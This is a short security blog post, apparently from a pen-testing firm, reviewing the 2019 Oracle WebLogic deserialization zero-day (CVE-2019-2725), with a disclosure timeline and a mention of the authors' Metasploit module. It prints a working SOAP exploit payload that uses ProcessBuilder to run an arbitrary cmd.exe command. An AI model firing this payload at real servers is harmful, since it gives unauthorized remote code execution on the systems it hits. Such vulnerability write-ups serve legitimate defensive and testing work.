2secure by Octapus 2secure by Octapus
2secure
Plan de continuidad de negocio Política de Privacidad
Cambiar a Colombia

¿Conoces nuestros servicios? Contactar

New Weblogic 0day (More Metasploit Modules)

This time, a short review.

The last Sunday (April 21st), KnownSec 404 Team issued an alert about a new vulnerability that has been exploited in the wild, a 0day for Weblogic, as usual, a deserialization vulnerability, this time in one of its components deployed as a web service (wls9_async and wls-wsat). Some days later (April 23rd), China National Vulnerability Database[1] and time then (April 25th) Oracle, released a Critical Patch Update Advisory[2] about multiple vulnerabilities some of them related.

Reviewing in a bit more detail the technical information about the vulnerabilities [3], we realize that it was a bug straightforward to exploit since it is an XML serialization vulnerability very similar to some of those that appeared a couple of years ago for the same web container.

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>RandomString</wsa:Action>

<wsa:RelatesTo>RandomString</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd.exe</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>[HERE_THE_PAYLOAD]</>

</void>

</array>

<void method="start"/>

</void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body>

</soapenv:Envelope>

Knowing this, we set out to carry out some tests and that day (April 25th), We had a Metasploit module ready to exploit the vulnerability as you can see in the pull requests [4].

Then, the next day Oracle released an emergency Security Alert Advisory warning about the vulnerability (CVE-2019-2725[5]

we want to encourage the community to support the Metasploit project actively. It is an excellent tool that helps us in the pen-testing work.

 

References

[1] http://www.cnvd.org.cn/webinfo/show/4999

[2] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

[3] https://medium.com/@knownseczoomeye/knownsec-404-team-oracle-weblogic-deserialization-rce-vulnerability-0day-alert-90dd9a79ae93

[4] https://github.com/rapid7/metasploit-framework/pull/11780

[5] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html